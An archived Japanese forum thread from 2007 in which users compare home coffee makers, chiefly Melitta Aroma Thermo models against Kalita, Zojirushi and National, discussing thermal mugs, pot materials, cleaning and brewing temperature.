109 :名無しさん@( ・∀・)つ旦~:2007/01/16(火) 07:55:48 ID:???
>>108
店舗による。

110 :名無しさん@( ・∀・)つ旦~:2007/01/17(水) 01:08:02 ID:???
コーヒーメーカーは、いくら眺めても味はわからないのです。

111 :名無しさん@( ・∀・)つ旦~:2007/01/18(木) 18:32:53 ID:???
ネスレでしょう、やはり。

112 :名無しさん@( ・∀・)つ旦~:2007/01/23(火) 16:04:56 ID:nzMjs0vQ
サーモスのECB1000を使っている方はおられますか?
抽出口から結構蒸気が出ています。
ポットの上あたりは蒸気でぬれて本体の「THERMOS」と書いてあるあたりまで蒸気があがりますが
この状態は普通なのでしょうか?コーヒーメーカーを使うのが初めてなので不安です。
宜しくお願いいたします。

113 :名無しさん@( ・∀・)つ旦~:2007/01/23(火) 23:56:21 ID:???
最初に3分くらい蒸らしてから再びドリップがはじまって、杯数の半分だけどりっぷして残りの半分をお湯を足してくれる。
というような松屋式を自動でしてくれるコーヒーメーカーはありませんか?

114 :名無しさん@( ・∀・)つ旦~:2007/01/24(水) 10:29:00 ID:???
メリタのアロマサーモステンレス買いました。
これいいですね。
出来たコーヒーも熱々ですし、味もなかなかです。
前のはぬるくて不味かったから嬉しいです。

115 :名無しさん@( ・∀・)つ旦~:2007/01/29(月) 10:27:58 ID:/k0nTnnr
コーヒーメーカーについて教えていただきたいのですが
現在、サーバーがステンレスで水タンクが取り外せる事を条件に
象印EC-JS80を検討していますが紙フィルターのサイズが103しか
使えないとの事ですが、使用されている方で102でも問題無く
使えているでしょうか?
 

116 :名無しさん@( ・∀・)つ旦~:2007/02/01(木) 04:46:49 ID:???
「いきなりコーヒー」を使用されてる方いますか?
大変気にはなるのですが、使い心地はどうですか?
素直にナショナルのNC-A55あたりを買った方がいいのかな・・・。


117 :名無しさん@( ・∀・)つ旦~:2007/02/01(木) 06:41:12 ID:???
>>116
こっちのスレがいいかも。
【生豆】焙煎・ミルもやるコーヒーメーカー【自動】
http://food7.2ch.net/test/read.cgi/pot/1116160499/

118 :名無しさん@( ・∀・)つ旦~:2007/02/02(金) 21:07:10 ID:RPcNhtJv
アロマサーモ(JCM-555か512)の購入を検討しています。
抽出容器について教えてください。
一人分(200cc程度)だけ入れたい時に、
好きな容器に直接入れることはできますか?
できないようであれば、555のマグ付きを購入しようかと思っていますが、
他にも直接好きな容器に注げる機種でオススメあれば教えてください。

119 :名無しさん@( ・∀・)つ旦~:2007/02/02(金) 21:34:09 ID:???
>>118
JCM-555も512も液ダレ防止機構との関係で、専用サーバーと専用マグにしか
抽出できない。

555のマグは保温性かなり高いよ。これで密閉なら文句無いんだけどね…

120 :名無しさん@( ・∀・)つ旦~:2007/02/02(金) 23:41:15 ID:???
レスありがとうございます。
好きなカップに直接、とダラな事はできないんですね。
ちょと残念だけど専用マグで飲むことにします。

121 :116:2007/02/03(土) 04:10:27 ID:ALd4GozP
>>117
ありがとう。移動します。

122 :名無しさん@( ・∀・)つ旦~:2007/02/03(土) 07:55:57 ID:???
今買うならカリタの新製品が一番いいね
OEMっぽいけど、良カスタマイズされてるし

123 :名無しさん@( ・∀・)つ旦~:2007/02/03(土) 11:41:11 ID:???
ナショナルの新製品まだー?

124 :名無しさん@( ・∀・)つ旦~:2007/02/03(土) 13:50:14 ID:???
>>87 amazonレビューのコピペして楽しい?

で、サイフォン式コーヒーメーカーってどうなの?

125 :名無しさん@( ・∀・)つ旦~:2007/02/05(月) 10:49:17 ID:???
>>124
ツインバードの奴持ってるが、
アルコールランプが電気ヒーターになっているだけで、
入れる手間とネルの管理は普通のサイフォンと同じ。
火を使わない分、安全ではあると思う。
サイフォンが好きで手間をかけてもいいなら買う価値あり。

126 :名無しさん@( ・∀・)つ旦~:2007/02/06(火) 00:58:01 ID:???
ボダムかツインバードか…悩む

127 :名無しさん@( ・∀・)つ旦~:2007/02/06(火) 22:42:36 ID:???
いろいろ捜して、ナショナルに傾きかけていたんだが、
↓見て、デバイスタイルCA-5Sにしようかと。

http://mames.jp/ca5s.html

ミルは「みるっこ」にするつもりだから、ミル付きはいらないしね。

128 :127:2007/02/07(水) 00:23:00 ID:???
>>127
う〜〜〜〜〜〜ん、関連会社だったみたい・・・・
確かに褒めすぎかなとは思ったんだが・・・・


南青山マメーズ

デバイスタイルのスタッフが「Brunopasso コーヒーメーカー」で
淹れるのにふさわしいコーヒー豆がないので、それなら自分達で
探してこようと始めたのがこのお店です。

コーヒー豆の品質、産地、作り手、栽培方法などをきちんと明示
することができ、カップテイスティングによって高得点を得たスペ
シャルティ・コーヒーのみを販売してます。 入手困難なイエメンの
バニーマタルも購入できます。


129 :名無しさん@( ・∀・)つ旦~:2007/02/12(月) 23:53:56 ID:???
バニーなら、WTRにいつでもあるよ。
イスマイリーは別だけど。

130 :名無しさん@( ・∀・)つ旦~:2007/02/17(土) 01:32:05 ID:OwdFe1wE
ちゃんとした豆買うなら手作業で入れたほうが良い。
最初に蒸らす事もしないしなメーカー、この部分だけ手作業でやってる

131 :名無しさん@( ・∀・)つ旦~:2007/02/19(月) 00:56:45 ID:???
湯温が低いコーヒーメーカーってある?
メリタのエグい味飽きた

132 :名無しさん@( ・∀・)つ旦~:2007/02/19(月) 01:50:05 ID:???
>>131
>>127のやつ。ぬるい。

133 :名無しさん@( ・∀・)つ旦~:2007/02/19(月) 18:01:24 ID:???
>>130
スイッチを入れて、湯が出たらOFF。
もっとも、ET-102じゃないと出来ないかも知れないが。

>>131
カリタET-102 94〜95℃程度。
湯を散らして落とすので、冷める。


134 :名無しさん@( ・∀・)つ旦~:2007/02/19(月) 18:25:39 ID:???
メリタ アロマサーモ JCM−561って
なんで価格コムとかベストゲートに
ひっかからんのやろ?

135 :名無しさん@( ・∀・)つ旦~:2007/02/21(水) 22:42:52 ID:???
>>134
ヨドバシコムにも何故かない。
だから店舗まで行って買ったよ。
6980だったけど値切って6500にしてもらった。

136 :名無しさん@( ・∀・)つ旦~:2007/02/21(水) 22:55:10 ID:???
>>135
尼でも7,560するのに、それは良い買い物をしたな

137 :名無しさん@( ・∀・)つ旦~:2007/02/21(水) 23:18:26 ID:???
アマゾンのコーヒー関連商品は軒並み高い

138 :名無しさん@( ・∀・)つ旦~:2007/02/22(木) 00:34:10 ID:???
秋にJCM−561をアマゾンで買ったけど
¥6,980でギフト券¥750付きだったよ。

139 :名無しさん@( ・∀・)つ旦~:2007/02/22(木) 03:18:31 ID:MowGmbkg
ヤフーで561を買ったら粉1キロ分おまけに付いてきた
なかなかオトク
田代コーヒーね
独りもんなので余らすと思うけど(笑)
使い勝手はなかなかいいよ
512と迷ったけど、アイスコーヒーも出来る所から決定した
561はヨドバシにもあったね


140 :名無しさん@( ・∀・)つ旦~:2007/02/22(木) 15:46:30 ID:???
512は安いけど、オレそそっかしいから絶対ポット割ると思って561にした。
一回割ってポット交換したら結局高くつくもんな。
こっちにして正解だったと思う。
夏になったら氷ガシガシぶちこんでアイスコーヒー作るぞ。

141 :名無しさん@( ・∀・)つ旦~:2007/02/22(木) 17:50:46 ID:???
俺512−♪
初期型なんで蓋のネジが締めにくいのが難点だけど慣れた。

142 :名無しさん@( ・∀・)つ旦~:2007/02/22(木) 20:02:53 ID:???
一人暮らしなら555が正解。マグならアイスコーヒーも作れるしな。
客が来たとき以外、ポット使ったこと無い。

143 :141:2007/02/22(木) 20:51:18 ID:???
>>142
555のマグだけ買って、初期型512に付けて使ってますよ。
確かに便利。
http://www.amazon.co.jp/o/ASIN/B000FZ3FX4

144 :名無しさん@( ・∀・)つ旦~:2007/02/22(木) 22:03:54 ID:???
俺は561にマグを買い足して使ってる。
確かに一人の時はマグしか使わないな。

145 :名無しさん@( ・∀・)つ旦~:2007/02/22(木) 22:26:59 ID:???
512や561のポットを555のマグに付け替えてもしずく垂れしたりしない?
ポットなら抽出途中で取り外しても垂れたりしないよね。

146 :名無しさん@( ・∀・)つ旦~:2007/02/22(木) 22:34:04 ID:???
>>145
512は高さも同じなんで全然問題ないス
561は知らない。

147 :名無しさん@( ・∀・)つ旦~:2007/02/22(木) 22:38:10 ID:???
>>146
アリガd うちの512なんで使ってみるよー
洗い物が少なくなるのはイイ

148 :名無しさん@( ・∀・)つ旦~:2007/02/22(木) 22:55:35 ID:???
要するにアロマサーモシリーズは、それぞれ色が違うだけで
形はどれも同じなんだよね。
だからポット類やマグは全て組み合わせ自由。

149 :134:2007/02/22(木) 23:39:57 ID:???
やっぱメリタ愛用者多いな。
1031でスイングバスケットの受け軸が折れたので、
561買おうかと思ってたんだけど、受け軸をネジで
代用して修理してしまったので、買えなくなっちゃった。
(軸折ったのは自分の不注意)

そもそも5杯用が欲しかったんだけど、当時561は出ていな
かったから諦めて1031買ったんだよね。1031デカイんだ。。。
夏にアイスを作り溜めするのにはいいんだけどね。

561を買う気マンマンでネットで安いとこ探してたのに、
ふと思いついて修理出来てしまったため、この物欲を
どこにぶつけていいやら。。。

150 :名無しさん@( ・∀・)つ旦~:2007/02/23(金) 00:27:11 ID:???
>>147
うーん。自分も512に555のマグをつけてるけど、スタバマグとかサーモマグとかにも
言えることだが、あの手の蓋付マグは、コーヒーの香りを楽しむって意味では相当劣
るよね。結局カップに注いで飲んでる。だから、洗い物は減ってないな。

でも、それを置いても、あのマグは量も保温性も良いよ。おすすめ。サーバより洗い
やすいのは確かだし。

151 :名無しさん@( ・∀・)つ旦~:2007/02/23(金) 00:42:36 ID:???
PCの脇に置いて使うにはあのマグ良さそうだね。
陶器verを出してほしいな。
ステンレスはあの飲み口の金属味がイマイチで。
似たような大きさのマグで代用できないもんだろうか。

152 :名無しさん@( ・∀・)つ旦~:2007/02/23(金) 01:36:09 ID:???
あのマグはヨドバシコムで通販開始して二日後に全部売り切れたからな
(まぁ、元がいくつあったんだがしらないが)
最近のメリタの殆どのマシンで使える事が判明して、一気に売れたんだよ、確か楽天のSHOPに情報がその時載って…
当然楽天のそのお店のも当時瞬殺だった。
最近やっと流通が落ち着いてきたのかな?
ちなみにいっときますが、保温性能はサーモスとかに比べると負けまくりです。
それでもよろしければ…あとコーヒーメーカー側の水の量間違えるとエライコトになります(笑
初めにタンブラーに水入れて、それをマシンに注いで、タンブラー1杯にしたければ、豆が蒸れる分少々水をマシンに追加、
ってかんじの使い方が宜しいかと。

153 :名無しさん@( ・∀・)つ旦~:2007/02/23(金) 01:45:44 ID:???
512に555のマグって使えるんだ・・・
俺は511使いなんだが、ホットプレートの問題さえ何とかすれば使えるかな?

154 :名無しさん@( ・∀・)つ旦~:2007/02/23(金) 02:52:51 ID:???
>>153
ホットプレートだけオフにできて、高さが512系と同じなら使えるのでは?と勝手に判断
ちなみに
http://www.rakuten.co.jp/coffee-market/377894/378061/378003/#442464
では512で使えると確かに書いてあるね。

155 :名無しさん@( ・∀・)つ旦~:2007/02/23(金) 06:54:39 ID:zJuLWGga
最近561を買い、ヨドバシ見た555のマグがいいなあと思いヤフーでポチしたのはいいが

これ倒れやすくない?

まだ届いていないんだけど


156 :名無しさん@( ・∀・)つ旦~:2007/02/23(金) 08:21:17 ID:???
>>155
大丈夫だよ。
見た目ほど倒れやすくない。
底に滑り止めもついてるしね。

157 :名無しさん@( ・∀・)つ旦~:2007/02/23(金) 15:18:15 ID:???
555のマグに?うちのはついてないが。

158 :名無しさん@( ・∀・)つ旦~:2007/02/23(金) 17:06:33 ID:Z08d0J1p
>>157
そうなの?
後でマグだけ買い足したんだけど、
底に丸いゴムシートみたいのが付いてるよ。

159 :名無しさん@( ・∀・)つ旦~:2007/03/03(土) 12:00:44 ID:???
メリタまずうううううううううううううううううううううううううううううううううううういいいいいいいいいいいいいいい
だまされるなああああああああああああああああああああああああああああああああああああああああ

160 :名無しさん@( ・∀・)つ旦~:2007/03/03(土) 23:23:13 ID:???
>>159
どういうふうに不味いのか言ってくれないと分からないよ。
濃すぎて不味いとか、薄すぎて不味いとかさ。
それぞれ好みが違うんだし。

161 :名無しさん@( ・∀・)つ旦~:2007/03/16(金) 14:36:28 ID:???
メリタの561と555って、ポットの形が違うだけで、機能的にはあまり変わってない?
洗い安さとか?使いやすさが変わらないなら、マグも付いて値段が安い555にしようかなと思うんだけど。

今まで象印で、味もそこそこなので、また安いEC-TB40でも買おうかと思ったけど、やはり保温ポッドの方が便利そうだからね。
象印でも5杯用くらいのそういうのがあればいいんだけど、8杯用のでかいのしかないみたいだから、そこそこ評判のいい
メリタにしようかなってところ

162 :名無しさん@( ・∀・)つ旦~:2007/03/16(金) 23:44:37 ID:???
>>161
561はステンレス
味は過去ログ読んどくように

163 :名無しさん@( ・∀・)つ旦~:2007/03/17(土) 01:11:09 ID:???
>>162
555もステンレスじゃないの?
ポッドの素材なら、全体的にステンレスになっただけで、
512も中の入れるところはステンレスじゃない?アルミみたいに光ってたよ。
実物見たら。ポッド。

で注ぐところもステンレスなのが、555だった。561の実物は見てないな。

164 :名無しさん@( ・∀・)つ旦~:2007/03/17(土) 02:10:22 ID:???
ポッドってのが何を意味してるのかわからんが、555の5杯用のポットはガラス魔法瓶だよ。
それに3杯用のステンレスの保温マグがついてる。
一人暮らしなら、このマグはめちゃくちゃ使える。家族もコーヒー飲むなら迷わず561。

165 :名無しさん@( ・∀・)つ旦~:2007/03/17(土) 10:01:41 ID:+qT9xVr1
自分が561にした理由は
ステンレスじゃないと氷を入れると割れる
なんて読んだから

夏はホットじゃきついからねえ


166 :名無しさん@( ・∀・)つ旦~:2007/03/17(土) 13:25:16 ID:???
>>164
555のポット見たけど、外側はガラスだったけど、中の筒はステンレスじゃないの?魔法瓶なら?
銀色だったよ。

167 :名無しさん@( ・∀・)つ旦~:2007/03/17(土) 22:58:01 ID:57/VoMe+
>>166
555のポットは、外側がプラスチック、中はガラスです。
ガラス魔法瓶は、中が銀色に見えるので間違えそうですが、
あれはガラスの外側に保温力を増すための金属コーティングをしてあるためです。
561のポットは内も外も正真正銘のステンレスですね。

168 :名無しさん@( ・∀・)つ旦~:2007/03/18(日) 01:10:49 ID:???
金属コーティングっていうか、外金属で中ガラスってのがもともとの魔法瓶じゃん。
アロマサーモの512とか555とかは、プラスチックの型にその魔法瓶が入ってる構造。

169 :名無しさん@( ・∀・)つ旦~:2007/03/18(日) 13:03:17 ID:???
561の購入を迷ってるんだけど、ポット洗いにくかったりしない?
これまでガラスポットしか使った事無いので、この口が小さく見えてちと不安。



170 :名無しさん@( ・∀・)つ旦~:2007/03/18(日) 13:19:11 ID:???
ナショナルのミルなし、ステンレスまだ〜??

171 :名無しさん@( ・∀・)つ旦~:2007/03/18(日) 22:30:08 ID:???
>>169
やはり口が小さくて、手が入らないのでガラスポットのようには洗えませんね。
柄付きのスポンジブラシか何かを使うと中も洗えます。

172 :名無しさん@( ・∀・)つ旦~:2007/03/20(火) 12:44:44 ID:dYZHDyFL
象印のEC-JS80はポット洗いやすい?

173 :名無しさん@( ・∀・)つ旦~:2007/03/20(火) 19:07:47 ID:???
ポット割った…。
そんなに高いの使ってないから、価格的にポット割ったときが買い替えなんだよな。
まだ本体が使えるのに勿体無いと重いつつ、安売りしないポットは数千円だもんな。本体の方が安いよ。
電気屋いってこよ。欝だ

174 :名無しさん@( ・∀・)つ旦~:2007/03/20(火) 19:42:06 ID:???
だからステンレスにしとけとあれほど

175 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 01:16:34 ID:PhpODyWp
質問なんですが4月から一人暮らしをするんですがコーヒーが好きで実家に居るときも
よく飲んでたんですが一人暮らしだとどのコーヒーメーカーがオススメですか?
ブルックスやインスタントでもいいかなと考えたこともあったんですが引っ越し先の近くに
コーヒー豆の専門店があるのでせっかくなのでコーヒーメーカーで飲みたいと思っています。
宜しくお願いします。

176 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 01:40:01 ID:???
ならハンドドリップだろ、ハリオのV60だっけか
そういうの

177 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 11:07:57 ID:???
>>175
それならメリタのアロマサーモ555がぴったりです。
保温マグとポット両方付いてるので、一人の時はマグで、友達が来たとき等はポットで5杯分までいれられます。
マグは一人の時はなかなか重宝しますよ。

178 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 11:49:45 ID:???
メリタやめたほうがいい。豆によってはとんでもないコーヒーが入る。
ハンドドリップかカリタのET102かCM102で充分。安定してうまい。
保温マグが欲しいなら別に買えば良し。
まあメリタを買って後悔するのが一番良かろう。買って見なきゃ分からない事もある。
金があるならデバスタかナショもいいんじゃないかな。
前者はゴールドフィルター&浄水機能つき、
後者はシャワー式でお湯が満遍なく当たり温度調節もできる、蒸らし機能つき。
金属フィルターやゴールドフィルターはオイル分を通すのでまろやかさが出るが、
微粉がカップに落ちるのであまりオススメはしないが…。

179 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 11:58:34 ID:???
>>178
メリタだと、どんな豆で、どのようにとんでもないコーヒーになるのですか?
具体的にお教え頂けないでしょうか。
私も買うつもりでいたので。

180 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 12:22:12 ID:???
過去スレでも何度も言われてるが、温度が高すぎるから、
渋い、苦いコーヒー、喉に引っかかるような苦味が出て、
トゲトゲしい、後味の渋い、バランスの悪いコーヒーができる。
そのようなコーヒーがコーヒーであるという人にはもってこい。
時々、美味しいコーヒーが入る時は、ボディが弱い豆かな。
細かい部分のメンテナンスが効かない。給水部分が洗えないし湯口も錆びる。
どんどん味が落ちていく。
それを熱々で美味い!と飲むのが自称コーヒー通の味音痴。

181 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 12:57:39 ID:???
>>180
なるほど。
湯温が高いのが売りなのに、それが逆にあだとなるわけですか。
浅煎り系の豆にはいいのかもしりませんね。

182 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 14:22:28 ID:???
でもメリタの555が一番便利そうなんだよな。
マグも付いてっての他にあるっけ?
味はそう変わらないんじゃないかと思うけどな。
カリタの買ってる人がそもそもめったにいないし。
メンテはしにくいのは確かみたいだが。

183 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 15:26:14 ID:xY7uzNYh
>>175
ブルックスやインスタントで気にならないのでしたら
メリタ555で十分だと思いますよ。
うちも使ってますが、全然問題を感じません。
それほどの通ではありませんし。

184 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 15:40:25 ID:???
>>181
浅煎りでもまずくなるよ。スプレモとか。モカの浅いのはいけるかもな。
豆次第。苦味や甘みの強い豆は向かない。甘味は渋味に変化する。

185 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 18:44:25 ID:PhpODyWp
>>175です
私もそこまで通ということではないんですが、やはり家でコーヒーメーカーで煎れてもらう
コーヒーや喫茶店で飲むコーヒーとネスカフェなどのインスタントのコーヒーと比べると味の差は分かります。
やはりコーヒーメーカー専門のカリタやメリタがいいんでしょうか?

186 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 18:45:05 ID:???
そんなにまずかったらこんなに売れてないと思うが・・・
そもそもメリタって老舗だし。コーヒーメーカーの。
歴史古いのに、そんなまずいもん作らないと思うな。

187 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 19:42:18 ID:???
コーヒーメーカーだけは技術的な工夫というものをあまり感じない
値段の割りに原始的な機能しか持ち合わせてない

188 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 20:14:53 ID:14gZ7Ysi
メリタへの評価は、高温抽出を是とするか非とするかが全て。
俺は今までぬるまっこい出来上がりのコーヒーメーカーに辟易していたから、
メリタの高温は是としてるんだけど。
そのためのバイメタル方式はなかなかの優れ物だと思う。


189 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 20:33:25 ID:???
マイコン搭載で蒸らし、温度管理、淹れる粉の量に
あわせて抽出時間調整したりとかいろいろできる家庭用コーヒーメーカーを
販売したらバカ売れしそうだ。
ありそうでないよなぁ。大手ならそれほどコスト掛けずに作れそうな気がするんだが。

190 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 20:51:23 ID:???
ナショナル神に期待!

191 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 21:01:31 ID:???
メリタが売れてるのは合理的な設計で製造コスト落として小売店に安く仕出してるからだろ。
販売戦略に長けてる。
ターゲットはちょうどこのスレで質問してくるような人達。

192 :名無しさん@( ・∀・)つ旦~:2007/03/21(水) 21:12:11 ID:???
>>180
高温抽出で不味くなるような豆使うのやめようよ。
ひょっとして自分で焼いてる?

193 :名無しさん@( ・∀・)つ旦~:2007/03/22(木) 07:00:02 ID:UKSlGpFj
フレンチプレスみたいなマニュアル・コーヒーメーカーって【方法】珈琲の淹れ方・器具 総合スレPart5【器具】だよな?
フレンチプレスの場合は専用スッドレがあるからいいとして。

194 :名無しさん@( ・∀・)つ旦~:2007/03/22(木) 07:43:39 ID:???
>>189
既にあるんじゃね?

195 :名無しさん@( ・∀・)つ旦~:2007/03/22(木) 23:28:04 ID:H4i16g7E
>>194
完全な制御をこなすのは業務用機以外は無い
バイメタルも大雑把にいえば原始的な機械制御だしね

196 :名無しさん@( ・∀・)つ旦~:2007/03/23(金) 08:20:18 ID:???
カリタのET102とかCM102とか買ってドリッパー部分をコーヒーバネットとかハリオのV60に入れ代える
それが考えつくベストの方法だな

54 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)